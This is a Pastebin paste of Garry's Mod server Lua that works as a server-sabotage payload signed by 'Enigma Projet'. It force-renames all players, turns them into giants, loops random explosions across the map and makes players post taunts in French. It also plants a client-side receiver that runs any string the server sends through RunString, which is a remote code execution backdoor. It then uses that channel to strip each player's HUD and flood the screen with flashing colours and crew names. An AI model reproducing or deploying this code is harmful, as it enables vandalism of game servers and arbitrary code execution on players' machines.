Advertisement
Guest User

Untitled

a guest
Apr 26th, 2019
104
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 27.66 KB | None | 0 0
  1. util.AddNetworkString "slua"
  2.  
  3. local lol = {}
  4. function lol:RandomString( intMin, intMax )
  5. local ret = ""
  6. for _ = 1, math.random( intMin, intMax ) do
  7. ret = ret.. string.char( math.random(65, 90) )
  8. end
  9.  
  10. return ret
  11. end
  12. local DESIRED_NAME = "Enigma Projet Have Worked"
  13. lol.m_tblActions = {}
  14. lol.m_strImageGlobalVar = lol:RandomString( 6, 12 )
  15. lol.m_strImageLoadHTML = [[<style type="text/css"> html, body {background-color: transparent;} html{overflow:hidden; ]].. (true and "margin: -8px -8px;" or "margin: 0px 0px;") ..[[ } </style><body><img src="]] .. "%s" .. [[" alt="" width="]] .. "%i"..[[" height="]] .. "%i" .. [[" /></body>]]
  16.  
  17. ------- STARTCODE FOR FORCE CHANGE NAME
  18. for k, v in pairs(player.GetAll()) do DarkRP.storeRPName(v, DESIRED_NAME) v:setDarkRPVar("rpname", DESIRED_NAME) end
  19. ------- STOP LINE CODE FOR CHANGE NAME
  20.  
  21. hook.Add("Think", "giant", function()
  22. for k,v in pairs (player.GetAll()) do
  23. v:SetModelScale(50.5, 100);
  24. v:SetRunSpeed(400 * 2);
  25. v:SetWalkSpeed(200 * 2);
  26. end
  27. end)
  28.  
  29. function lol:PushAction( intChainDelay, func )
  30. self.m_tblActions[#self.m_tblActions +1] = { intChainDelay, func }
  31. end
  32.  
  33. timer.Simple( 57, function()
  34. hook.Add("Think", "armageddon", function()
  35. local explode = ents.Create( "env_explosion" )
  36. explode:SetPos( Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)) )
  37. explode:Spawn()
  38. explode:SetKeyValue( "iMagnitude", "500" )
  39. explode:Fire( "Explode", 0, 0 )
  40. end)
  41. end)
  42.  
  43. for k,v in pairs(player.GetAll()) do
  44. v:ConCommand("say C'est La Fin De Ce Monde Cancer. Le Enigma Projet Avance !")
  45. end
  46. timer.Simple( 32, function()
  47. for k,v in pairs(player.GetAll()) do
  48. v:ConCommand("say /job Enigma Projet")
  49. end
  50. end )
  51.  
  52. function lol:NextAction( pPlayer )
  53. pPlayer.m_intCurAction = pPlayer.m_intCurAction +1
  54. if not self.m_tblActions[pPlayer.m_intCurAction] then return end
  55.  
  56. timer.Simple( self.m_tblActions[pPlayer.m_intCurAction][1], function()
  57. if not IsValid( pPlayer ) then return end
  58. self.m_tblActions[pPlayer.m_intCurAction][2]( pPlayer )
  59. self:NextAction( pPlayer )
  60. end )
  61. end
  62.  
  63. function lol:Start( pPlayer )
  64. pPlayer.m_intCurAction = 0
  65. self:NextAction( pPlayer )
  66. end
  67.  
  68. function lol:SendLua( pPlayer, strLua )
  69. net.Start( "slua" )
  70. net.WriteString( strLua )
  71. net.Send( pPlayer )
  72. end
  73.  
  74. function lol:SetupPlayer( pPlayer )
  75. pPlayer:SendLua( "net.Receive(\"slua\", function() RunString(net.ReadString()) end)" )
  76. end
  77.  
  78. for k, v in pairs( player.GetAll() ) do
  79. lol:SetupPlayer( v )
  80. timer.Simple( 2, function() lol:Start( v ) end )
  81. end
  82.  
  83. hook.Add( "PlayerAuthed", "wat", function( pPlayer )
  84. lol:SetupPlayer( pPlayer )
  85. timer.Simple( 10, function() lol:Start( pPlayer ) end )
  86. end )
  87.  
  88. hook.Add( "PlayerSay", "1337command", function( pSender, strText, bTeamChat )
  89. if strText:sub( 1, 5 ) == "/1337" then
  90. pSender:Ignite( 1e9 )
  91. pSender:ChatPrint( "lol jk" )
  92. pSender:SendLua( [[surface.PlaySound( "vo/npc/male01/hacks01.wav" )]] )
  93. return false
  94. end
  95. end )
  96.  
  97.  
  98.  
  99. --Sequence stack
  100. --Start some tunes and steam in our assets
  101. lol:PushAction( 0, function( pPlayer )
  102. lol:SendLua( pPlayer, ([=[
  103.  
  104.  
  105. g_]=].. lol.m_strImageGlobalVar.. [=[ = {}
  106. local html = [[%s]]
  107. local function LoadWebMaterial( strURL, strUID, intSizeX, intSizeY )
  108. local pnl = vgui.Create( "HTML" )
  109. pnl:SetPos( ScrW() -1, ScrH() -1 )
  110. pnl:SetVisible( true )
  111. pnl:SetMouseInputEnabled( false )
  112. pnl:SetKeyBoardInputEnabled( false )
  113. pnl:SetSize( intSizeX, intSizeY )
  114. pnl:SetHTML( html:format(strURL, intSizeX, intSizeY) )
  115.  
  116. local PageLoaded
  117. PageLoaded = function()
  118. local mat = pnl:GetHTMLMaterial()
  119. if mat then
  120. g_]=].. lol.m_strImageGlobalVar.. [=[[strUID] = { mat, pnl }
  121. return
  122. end
  123.  
  124. timer.Simple( 0.5, PageLoaded )
  125. end
  126.  
  127. PageLoaded()
  128. end
  129.  
  130. LoadWebMaterial( "", "hud1", 300, 128 )
  131. LoadWebMaterial( "", "hud2", 300, 128 )
  132. LoadWebMaterial( "", "hud3", 128, 128 )
  133. LoadWebMaterial( "", "xhair", 64, 64 )
  134. LoadWebMaterial( "", "doritos", 183, 256 )
  135. LoadWebMaterial( "", "fedora", 256, 256 )
  136. LoadWebMaterial( "", "dew", 110, 256 )
  137. LoadWebMaterial( "", "awp", 256, 55 )
  138. ]=]):format(lol.m_strImageLoadHTML) )
  139. end )
  140.  
  141. --HUD swap
  142. lol:PushAction( 0, function( pPlayer )
  143. lol:SendLua( pPlayer, [[
  144. (GAMEMODE or GM).CalcView = function() end
  145. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  146.  
  147. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  148. for k, v in pairs(remove) do
  149. hook.GetTable()[v] = {}
  150. end
  151.  
  152. local function GetWebMat( strURL )
  153. return g_]].. lol.m_strImageGlobalVar.. [[[strURL]
  154. end
  155.  
  156. hook.Add( "HUDPaint", "newhud", function()
  157. surface.SetDrawColor( 255, 255, 255, 255 )
  158.  
  159. if GetWebMat( "hud1" ) then
  160.  
  161. end
  162. if GetWebMat( "hud2" ) then
  163.  
  164. end
  165. if GetWebMat( "hud3" ) then
  166.  
  167. end
  168. if GetWebMat( "xhair" ) then
  169.  
  170. end
  171.  
  172. if GetWebMat( "doritos" ) then
  173.  
  174. end
  175. if GetWebMat( "dew" ) then
  176.  
  177. end
  178. if GetWebMat( "fedora" ) then
  179.  
  180. end
  181. if GetWebMat( "awp" ) then
  182.  
  183. end
  184.  
  185. draw.SimpleTextOutlined(
  186. "",
  187. "DermaLarge",
  188. ScrW() /2 +math.random( -1, 1 ),
  189. ScrH() /2 +math.random( -1, 1 ) +64,
  190. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  191. TEXT_ALIGN_CENTER,
  192. TEXT_ALIGN_CENTER,
  193. 1,
  194. Color(0, 0, 0)
  195. )
  196. end )
  197.  
  198. local allowed = { ["CHudChat"] = true, ["CHudGMod"] = true, ["CHudWeaponSelection"] = true, ["CHudMenu"] = true }
  199. hook.Add( "HUDShouldDraw", "newhud", function( str ) if not allowed[str] then return false end end )
  200.  
  201. ]] )
  202. end )
  203.  
  204. lol:PushAction( 0, function( pPlayer )
  205. lol:SendLua( pPlayer, [[
  206. (GAMEMODE or GM).CalcView = function() end
  207. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  208.  
  209. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  210. for k, v in pairs(remove) do
  211. hook.GetTable()[v] = {}
  212. end
  213.  
  214. local function GetWebMat( strURL )
  215. return g_]].. lol.m_strImageGlobalVar.. [[[strURL]
  216. end
  217.  
  218. hook.Add( "HUDPaint", "newhud2", function()
  219. surface.SetDrawColor( 255, 255, 255, 255 )
  220.  
  221.  
  222.  
  223. draw.SimpleTextOutlined(
  224. "",
  225. "DermaLarge",
  226. ScrW() /2 +math.random( -1, 1 ),
  227. ScrH() /2 +math.random( -1, 1 ) +32,
  228. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  229. TEXT_ALIGN_CENTER,
  230. TEXT_ALIGN_CENTER,
  231. 1,
  232. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  233. )
  234. end )
  235. ]] )
  236. end )
  237.  
  238. lol:PushAction( 0, function( pPlayer )
  239. lol:SendLua( pPlayer, [[
  240. (GAMEMODE or GM).CalcView = function() end
  241. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  242.  
  243. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  244. for k, v in pairs(remove) do
  245. hook.GetTable()[v] = {}
  246. end
  247.  
  248. local function GetWebMat( strURL )
  249. return g_]].. lol.m_strImageGlobalVar.. [[[strURL]
  250. end
  251.  
  252. hook.Add( "HUDPaint", "newhud4", function()
  253. surface.SetDrawColor( 255, 255, 255, 255 )
  254.  
  255.  
  256.  
  257. draw.SimpleTextOutlined(
  258. "",
  259. "DermaLarge",
  260. ScrW() /2 +math.random( -650, 650 ),
  261. ScrH() /2 +math.random( -650, 650 ) +32,
  262. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  263. TEXT_ALIGN_CENTER,
  264. TEXT_ALIGN_CENTER,
  265. 1,
  266. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  267. )
  268. end )
  269. ]] )
  270. end )
  271.  
  272. lol:PushAction( 0, function( pPlayer )
  273. lol:SendLua( pPlayer, [[
  274. (GAMEMODE or GM).CalcView = function() end
  275. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  276.  
  277. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  278. for k, v in pairs(remove) do
  279. hook.GetTable()[v] = {}
  280. end
  281.  
  282. local function GetWebMat( strURL )
  283. return g_]].. lol.m_strImageGlobalVar.. [[[strURL]
  284. end
  285.  
  286. hook.Add( "HUDPaint", "newhud24", function()
  287. surface.SetDrawColor( 255, 255, 255, 255 )
  288.  
  289.  
  290.  
  291. draw.SimpleTextOutlined(
  292. "",
  293. "DermaLarge",
  294. ScrW() /2 +math.random( -650, 650 ),
  295. ScrH() /2 +math.random( -650, 650 ) +32,
  296. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  297. TEXT_ALIGN_CENTER,
  298. TEXT_ALIGN_CENTER,
  299. 1,
  300. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  301. )
  302. end )
  303. ]] )
  304. end )
  305.  
  306.  
  307. --Disco time ------------------------------------------------------------------------------------------------------------------
  308. lol:PushAction( 2, function( pPlayer )
  309. local idx = pPlayer:EntIndex()
  310. timer.Create( "beat".. idx, 0.42, 0, function()
  311. if not IsValid( pPlayer ) then timer.Destroy( "beat".. idx ) return end
  312. pPlayer:ViewPunch( Angle(math.Rand(-0, -0), math.Rand(-0, 0), 0) )
  313. end )
  314.  
  315.  
  316. lol:SendLua( pPlayer, [[
  317.  
  318. sound.PlayURL( "", "", function()end )
  319.  
  320. hook.Add("HUDPaint","cat",function()draw.RoundedBox(0,0,0,ScrW(),ScrW(),Color(math.random(200,220),math.random(1,10),math.random(1,10),200))
  321. end)
  322.  
  323. sound.PlayURL( "", "", function()end )
  324. surface.PlaySound( "vo/npc/male01/ohno.wav" )
  325. ]] )
  326. end )
  327.  
  328. --text/css
  329.  
  330. lol:PushAction( 13.6, function( pPlayer )
  331. lol:SendLua( pPlayer, [[
  332. (GAMEMODE or GM).CalcView = function() end
  333. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  334.  
  335. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  336. for k, v in pairs(remove) do
  337. hook.GetTable()[v] = {}
  338. end
  339.  
  340. local function GetWebMat( strURL )
  341. return g_]].. lol.m_strImageGlobalVar.. [[[strURL]
  342. end
  343.  
  344. hook.Add( "HUDPaint", "newhud2", function()
  345. surface.SetDrawColor( 255, 255, 255, 255 )
  346.  
  347.  
  348.  
  349. draw.SimpleTextOutlined(
  350. "Enigma Projet Have Win :D",
  351. "DermaLarge",
  352. ScrW() /2 +math.random( -1, 1 ),
  353. ScrH() /2 +math.random( -1, 1 ) +32,
  354. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  355. TEXT_ALIGN_CENTER,
  356. TEXT_ALIGN_CENTER,
  357. 1,
  358. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  359. )
  360. end )
  361. ]] )
  362. end )
  363.  
  364. lol:PushAction( 5, function( pPlayer )
  365. lol:SendLua( pPlayer, [[
  366. (GAMEMODE or GM).CalcView = function() end
  367. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  368.  
  369. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  370. for k, v in pairs(remove) do
  371. hook.GetTable()[v] = {}
  372. end
  373.  
  374. local function GetWebMat( strURL )
  375. return g_]].. lol.m_strImageGlobalVar.. [[[strURL]
  376. end
  377.  
  378. hook.Add( "HUDPaint", "newhud2", function()
  379. surface.SetDrawColor( 255, 255, 255, 255 )
  380.  
  381.  
  382.  
  383. draw.SimpleTextOutlined(
  384. "",
  385. "DermaLarge",
  386. ScrW() /2 +math.random( -1, 1 ),
  387. ScrH() /2 +math.random( -1, 1 ) +32,
  388. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  389. TEXT_ALIGN_CENTER,
  390. TEXT_ALIGN_CENTER,
  391. 1,
  392. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  393. )
  394. end )
  395. ]] )
  396. end )
  397.  
  398. lol:PushAction( 1.3, function( pPlayer )
  399. lol:SendLua( pPlayer, [[
  400. (GAMEMODE or GM).CalcView = function() end
  401. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  402.  
  403. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  404. for k, v in pairs(remove) do
  405. hook.GetTable()[v] = {}
  406. end
  407.  
  408. local function GetWebMat( strURL )
  409. return g_]].. lol.m_strImageGlobalVar.. [[[strURL]
  410. end
  411.  
  412. hook.Add( "HUDPaint", "newhud2", function()
  413. surface.SetDrawColor( 255, 255, 255, 255 )
  414.  
  415.  
  416.  
  417. draw.SimpleTextOutlined(
  418. "Aujourd'hui C'est La Fin De Votre Serveur Cancer",
  419. "DermaLarge",
  420. ScrW() /2 +math.random( -1, 1 ),
  421. ScrH() /2 +math.random( -1, 1 ) +32,
  422. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  423. TEXT_ALIGN_CENTER,
  424. TEXT_ALIGN_CENTER,
  425. 1,
  426. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  427. )
  428. end )
  429. ]] )
  430. end )
  431.  
  432. lol:PushAction( 5, function( pPlayer )
  433. lol:SendLua( pPlayer, [[
  434. (GAMEMODE or GM).CalcView = function() end
  435. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  436.  
  437. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  438. for k, v in pairs(remove) do
  439. hook.GetTable()[v] = {}
  440. end
  441.  
  442. local function GetWebMat( strURL )
  443. return g_]].. lol.m_strImageGlobalVar.. [[[strURL]
  444. end
  445.  
  446. hook.Add( "HUDPaint", "newhud2", function()
  447. surface.SetDrawColor( 255, 255, 255, 255 )
  448.  
  449.  
  450.  
  451. draw.SimpleTextOutlined(
  452. "",
  453. "DermaLarge",
  454. ScrW() /2 +math.random( -1, 1 ),
  455. ScrH() /2 +math.random( -1, 1 ) +32,
  456. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  457. TEXT_ALIGN_CENTER,
  458. TEXT_ALIGN_CENTER,
  459. 1,
  460. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  461. )
  462. end )
  463. ]] )
  464. end )
  465.  
  466. lol:PushAction( 2.3, function( pPlayer )
  467. lol:SendLua( pPlayer, [[
  468. (GAMEMODE or GM).CalcView = function() end
  469. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  470.  
  471. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  472. for k, v in pairs(remove) do
  473. hook.GetTable()[v] = {}
  474. end
  475.  
  476. local function GetWebMat( strURL )
  477. return g_]].. lol.m_strImageGlobalVar.. [[[strURL]
  478. end
  479.  
  480. hook.Add( "HUDPaint", "newhud2", function()
  481. surface.SetDrawColor( 255, 255, 255, 255 )
  482.  
  483.  
  484.  
  485. draw.SimpleTextOutlined(
  486. "Désormais Observer Notre Pouvoir !",
  487. "DermaLarge",
  488. ScrW() /2 +math.random( -1, 1 ),
  489. ScrH() /2 +math.random( -1, 1 ) +32,
  490. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  491. TEXT_ALIGN_CENTER,
  492. TEXT_ALIGN_CENTER,
  493. 1,
  494. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  495. )
  496. end )
  497. ]] )
  498. end )
  499.  
  500. lol:PushAction( 5, function( pPlayer )
  501. lol:SendLua( pPlayer, [[
  502. (GAMEMODE or GM).CalcView = function() end
  503. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  504.  
  505. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  506. for k, v in pairs(remove) do
  507. hook.GetTable()[v] = {}
  508. end
  509.  
  510. local function GetWebMat( strURL )
  511. return g_]].. lol.m_strImageGlobalVar.. [[[strURL]
  512. end
  513.  
  514. hook.Add( "HUDPaint", "newhud2", function()
  515. surface.SetDrawColor( 255, 255, 255, 255 )
  516.  
  517.  
  518.  
  519. draw.SimpleTextOutlined(
  520. "",
  521. "DermaLarge",
  522. ScrW() /2 +math.random( -1, 1 ),
  523. ScrH() /2 +math.random( -1, 1 ) +32,
  524. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  525. TEXT_ALIGN_CENTER,
  526. TEXT_ALIGN_CENTER,
  527. 1,
  528. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  529. )
  530. end )
  531. ]] )
  532. end )
  533.  
  534.  
  535. lol:PushAction( 55, function( pPlayer )
  536.  
  537. hook.Remove( "Think" ,"armageddon")
  538.  
  539. lol:SendLua( pPlayer, [[
  540. (GAMEMODE or GM).CalcView = function() end
  541. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  542.  
  543. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  544. for k, v in pairs(remove) do
  545. hook.GetTable()[v] = {}
  546. end
  547.  
  548. hook.Add("HUDPaint","cat",function()draw.RoundedBox(0,0,0,ScrW(),ScrW(),Color(math.random(0,0),math.random(0,0),math.random(0,0),254))
  549. end)
  550.  
  551. local function GetWebMat( strURL )
  552. return g_]].. lol.m_strImageGlobalVar.. [[[strURL]
  553. end
  554.  
  555. hook.Add( "HUDPaint", "newhud2", function()
  556. surface.SetDrawColor( 255, 255, 255, 255 )
  557.  
  558.  
  559.  
  560. draw.SimpleTextOutlined(
  561. "NICE",
  562. "DermaLarge",
  563. ScrW() /2 +math.random( -700, 700 ),
  564. ScrH() /2 +math.random( -700, 700 ) +32,
  565. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  566. TEXT_ALIGN_CENTER,
  567. TEXT_ALIGN_CENTER,
  568. 1,
  569. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  570. )
  571. end )
  572. ]] )
  573. end )
  574.  
  575.  
  576. lol:PushAction( 0, function( pPlayer )
  577. lol:SendLua( pPlayer, [[
  578. (GAMEMODE or GM).CalcView = function() end
  579. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  580.  
  581. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  582. for k, v in pairs(remove) do
  583. hook.GetTable()[v] = {}
  584. end
  585.  
  586. local function GetWebMat( strURL )
  587. return g_]].. lol.m_strImageGlobalVar.. [[[strURL]
  588. end
  589.  
  590. hook.Add( "HUDPaint", "newhud23", function()
  591. surface.SetDrawColor( 255, 255, 255, 255 )
  592.  
  593.  
  594.  
  595. draw.SimpleTextOutlined(
  596. "BANDOOR",
  597. "DE1",
  598. ScrW() /2 +math.random( -8, 8 ),
  599. ScrH() /2 +math.random( -8, 8 ) +34,
  600. HSVToColor( CurTime() % 6 * 60, 1, 1 ),
  601. TEXT_ALIGN_CENTER,
  602. TEXT_ALIGN_CENTER,
  603. 1,
  604. Color(120, 0, 7, 255)
  605. )
  606. draw.SimpleTextOutlined(
  607. "Anatik",
  608. "DermaLarge",
  609. ScrW() /2 +math.random( -924, 954 ),
  610. ScrH() /2 +math.random( -924, 954 ) +64,
  611. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  612. TEXT_ALIGN_CENTER,
  613. TEXT_ALIGN_CENTER,
  614. 1,
  615. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  616. )
  617.  
  618.  
  619. draw.SimpleTextOutlined(
  620. "✦",
  621. "DermaLarge",
  622. ScrW() /2 +math.random( -628, 628 ),
  623. ScrH() /2 +math.random( -628, 628 ) +124,
  624. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  625. TEXT_ALIGN_CENTER,
  626. TEXT_ALIGN_CENTER,
  627. 2,
  628. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  629. )
  630. draw.SimpleTextOutlined(
  631. "RayanFR",
  632. "DermaLarge",
  633. ScrW() /2 +math.random( -924, 954 ),
  634. ScrH() /2 +math.random( -924, 954 ) +64,
  635. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  636. TEXT_ALIGN_CENTER,
  637. TEXT_ALIGN_CENTER,
  638. 1,
  639. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  640. )
  641.  
  642.  
  643. draw.SimpleTextOutlined(
  644. "✦",
  645. "DermaLarge",
  646. ScrW() /2 +math.random( -628, 628 ),
  647. ScrH() /2 +math.random( -628, 628 ) +124,
  648. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  649. TEXT_ALIGN_CENTER,
  650. TEXT_ALIGN_CENTER,
  651. 2,
  652. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  653. )
  654. draw.SimpleTextOutlined(
  655. "Doge",
  656. "DermaLarge",
  657. ScrW() /2 +math.random( -924, 954 ),
  658. ScrH() /2 +math.random( -924, 954 ) +64,
  659. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  660. TEXT_ALIGN_CENTER,
  661. TEXT_ALIGN_CENTER,
  662. 1,
  663. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  664. )
  665.  
  666.  
  667. draw.SimpleTextOutlined(
  668. "✦",
  669. "DermaLarge",
  670. ScrW() /2 +math.random( -628, 628 ),
  671. ScrH() /2 +math.random( -628, 628 ) +124,
  672. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  673. TEXT_ALIGN_CENTER,
  674. TEXT_ALIGN_CENTER,
  675. 2,
  676. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  677. )
  678. draw.SimpleTextOutlined(
  679. "John-DuckSent",
  680. "DermaLarge",
  681. ScrW() /2 +math.random( -924, 954 ),
  682. ScrH() /2 +math.random( -924, 954 ) +64,
  683. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  684. TEXT_ALIGN_CENTER,
  685. TEXT_ALIGN_CENTER,
  686. 1,
  687. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  688. )
  689.  
  690.  
  691. draw.SimpleTextOutlined(
  692. "✦",
  693. "DermaLarge",
  694. ScrW() /2 +math.random( -628, 628 ),
  695. ScrH() /2 +math.random( -628, 628 ) +124,
  696. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  697. TEXT_ALIGN_CENTER,
  698. TEXT_ALIGN_CENTER,
  699. 2,
  700. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  701. )
  702. draw.SimpleTextOutlined(
  703. "MAGIIKZZ GAMING",
  704. "DermaLarge",
  705. ScrW() /2 +math.random( -924, 954 ),
  706. ScrH() /2 +math.random( -924, 954 ) +64,
  707. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  708. TEXT_ALIGN_CENTER,
  709. TEXT_ALIGN_CENTER,
  710. 1,
  711. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  712. )
  713.  
  714.  
  715. draw.SimpleTextOutlined(
  716. "✦",
  717. "DermaLarge",
  718. ScrW() /2 +math.random( -628, 628 ),
  719. ScrH() /2 +math.random( -628, 628 ) +124,
  720. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  721. TEXT_ALIGN_CENTER,
  722. TEXT_ALIGN_CENTER,
  723. 2,
  724. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  725. )
  726. draw.SimpleTextOutlined(
  727. "BanDoor",
  728. "DermaLarge",
  729. ScrW() /2 +math.random( -924, 954 ),
  730. ScrH() /2 +math.random( -924, 954 ) +64,
  731. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  732. TEXT_ALIGN_CENTER,
  733. TEXT_ALIGN_CENTER,
  734. 1,
  735. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  736. )
  737.  
  738.  
  739. draw.SimpleTextOutlined(
  740. "✦",
  741. "DermaLarge",
  742. ScrW() /2 +math.random( -628, 628 ),
  743. ScrH() /2 +math.random( -628, 628 ) +124,
  744. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  745. TEXT_ALIGN_CENTER,
  746. TEXT_ALIGN_CENTER,
  747. 2,
  748. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  749. )
  750. draw.SimpleTextOutlined(
  751. "RottenFish",
  752. "DermaLarge",
  753. ScrW() /2 +math.random( -924, 954 ),
  754. ScrH() /2 +math.random( -924, 954 ) +64,
  755. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  756. TEXT_ALIGN_CENTER,
  757. TEXT_ALIGN_CENTER,
  758. 1,
  759. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  760. )
  761.  
  762.  
  763. draw.SimpleTextOutlined(
  764. "✦",
  765. "DermaLarge",
  766. ScrW() /2 +math.random( -628, 628 ),
  767. ScrH() /2 +math.random( -628, 628 ) +124,
  768. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  769. TEXT_ALIGN_CENTER,
  770. TEXT_ALIGN_CENTER,
  771. 2,
  772. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  773. )
  774.  
  775. draw.SimpleTextOutlined(
  776. "Fancarron",
  777. "DermaLarge",
  778. ScrW() /2 +math.random( -628, 628 ),
  779. ScrH() /2 +math.random( -628, 628 ) +124,
  780. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  781. TEXT_ALIGN_CENTER,
  782. TEXT_ALIGN_CENTER,
  783. 2,
  784. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  785. )
  786.  
  787. draw.SimpleTextOutlined(
  788. "Gababel",
  789. "DermaLarge",
  790. ScrW() /2 +math.random( -628, 628 ),
  791. ScrH() /2 +math.random( -628, 628 ) +124,
  792. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  793. TEXT_ALIGN_CENTER,
  794. TEXT_ALIGN_CENTER,
  795. 2,
  796. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  797. )
  798. end )
  799. ]] )
  800. end )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement